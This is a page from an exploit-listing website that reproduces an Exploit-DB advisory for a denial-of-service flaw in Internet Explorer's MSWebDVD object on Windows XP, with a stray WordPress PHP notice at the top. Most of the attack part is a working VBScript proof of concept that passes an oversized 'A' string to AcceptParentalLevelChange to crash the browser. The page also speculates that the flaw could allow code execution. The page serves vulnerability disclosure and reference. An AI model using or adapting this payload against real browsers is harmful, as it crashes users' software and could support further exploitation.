Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Denial of Service vulnerability in Internet Explorer - exploit.company
header-logo
Suggest Exploit
vendor:
Internet Explorer
by:
Unknown
5.5
CVSS
MEDIUM
Denial of Service
400
CWE
Product Name: Internet Explorer
Affected Version From: Not mentioned
Affected Version To: Not mentioned
Patch Exists: NO
Related CWE: CVE-2003-0927
CPE: a:microsoft:ie
Metasploit:
Other Scripts:
Platforms Tested: Windows XP
2003

Denial of Service vulnerability in Internet Explorer

The 'MSWebDVD' Object in Internet Explorer is prone to a denial of service vulnerability that allows remote attackers to crash the browser. By sending an excessive string value (about 255 characters) through a malicious site, an attacker can cause a denial of service condition in Internet Explorer.

Mitigation:

No specific mitigation mentioned in the source.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10056/info

It has been reported that Internet Explorer may be prone to a denial of service vulnerability that may allow remote attackers to cause the browser to crash. The issue exists in the 'MSWebDVD' Object. An attacker may cause a denial of service condition in an instance of Internet Explorer by evoking the method through a malicious site and sending an excessive string value (about 255 characters) in the following manner:

object.AcceptParentalLevelChange (boolean value),UserName as string,Password
as string

Internet Explorer running in Windows XP has been reported to be affected by this issue, however, it is possible that other versions are affected as well.

Due to the nature of this issue, it has been conjectured that this vulnerability may be leveraged to execute arbitrary code. This has not been confirmed at the moment. 


<script language=vbscript>
'On Error Resume Next
dim mymy2,a

a="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
Set mymy2= CreateObject("MSWebDVD.MSWebDVD.1")
mymy2.AcceptParentalLevelChange False, "xc", a

</script>

Navigation

Suggest Exploit

Services By CQR